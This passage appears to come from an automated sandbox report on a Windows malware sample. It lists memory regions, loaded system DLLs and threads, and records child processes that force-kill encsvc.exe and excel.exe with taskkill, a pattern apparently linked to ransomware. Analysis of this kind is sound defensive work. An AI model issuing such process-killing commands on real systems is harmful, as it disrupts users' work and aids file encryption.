0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 847 start_va = 0x390000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 848 start_va = 0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 849 start_va = 0x540000 end_va = 0x6c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 850 start_va = 0x6d0000 end_va = 0x850fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 851 start_va = 0x860000 end_va = 0x1c5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 852 start_va = 0x1d20000 end_va = 0x1d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 853 start_va = 0x1df0000 end_va = 0x1e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 854 start_va = 0x1ee0000 end_va = 0x1f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 855 start_va = 0x1f60000 end_va = 0x222efff entry_point = 0x1f60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 856 start_va = 0x2310000 end_va = 0x238ffff entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 857 start_va = 0x2400000 end_va = 0x247ffff entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 858 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 859 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 860 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 861 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 862 start_va = 0x7fef7020000 end_va = 0x7fef7033fff entry_point = 0x7fef7020000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 863 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 864 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 865 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 866 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 867 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 868 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 869 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 870 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 871 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 872 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 873 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 874 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 875 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 876 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 877 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 878 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 879 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 880 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 881 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 882 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 883 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 884 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 885 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 886 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 887 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 888 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 889 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 890 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 891 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 892 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 893 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 894 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 895 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 896 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 897 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 898 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Thread: id = 12 os_tid = 0x9c8 Thread: id = 23 os_tid = 0xa48 Thread: id = 28 os_tid = 0xa5c Thread: id = 80 os_tid = 0xab0 Thread: id = 81 os_tid = 0xab4 Process: id = "6" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x209b000" os_pid = "0x9d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM encsvc.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 278 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 279 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 280 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 281 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 282 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 283 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 284 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 285 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 286 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 287 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 288 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 289 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 290 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 291 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 292 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 775 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 776 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 777 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 778 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 779 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 780 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 781 start_va = 0x1e0000 end_va = 0x1e3fff entry_point = 0x1e0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 782 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 783 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 784 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 785 start_va = 0x2a0000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 786 start_va = 0x320000 end_va = 0x3dffff entry_point = 0x320000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 787 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 788 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 789 start_va = 0x520000 end_va = 0x6a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 790 start_va = 0x6b0000 end_va = 0x830fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 791 start_va = 0x840000 end_va = 0x1c3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 792 start_va = 0x1c70000 end_va = 0x1ceffff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 793 start_va = 0x1cf0000 end_va = 0x1d34fff entry_point = 0x1cf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 794 start_va = 0x1dc0000 end_va = 0x1e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 795 start_va = 0x1e40000 end_va = 0x210efff entry_point = 0x1e40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 796 start_va = 0x2230000 end_va = 0x22affff entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 797 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 798 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 799 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 800 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 801 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 802 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 803 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 804 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 805 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 806 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 807 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 808 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 809 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 810 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 811 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 812 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 813 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 814 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 815 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 816 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 817 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 818 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 819 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 820 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 821 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 822 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 823 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 824 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 825 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 826 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 827 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 828 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 829 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 830 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 831 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 832 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Thread: id = 14 os_tid = 0x9dc Thread: id = 27 os_tid = 0xa58 Thread: id = 79 os_tid = 0xaac Thread: id = 82 os_tid = 0xab8 Thread: id = 83 os_tid = 0xabc Process: id = "7" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x1cbb000" os_pid = "0xa08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM excel.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 355 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 356 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 357 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 358 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 359 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 360 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 361 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 362 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 363 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 364 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 365 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 366 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = 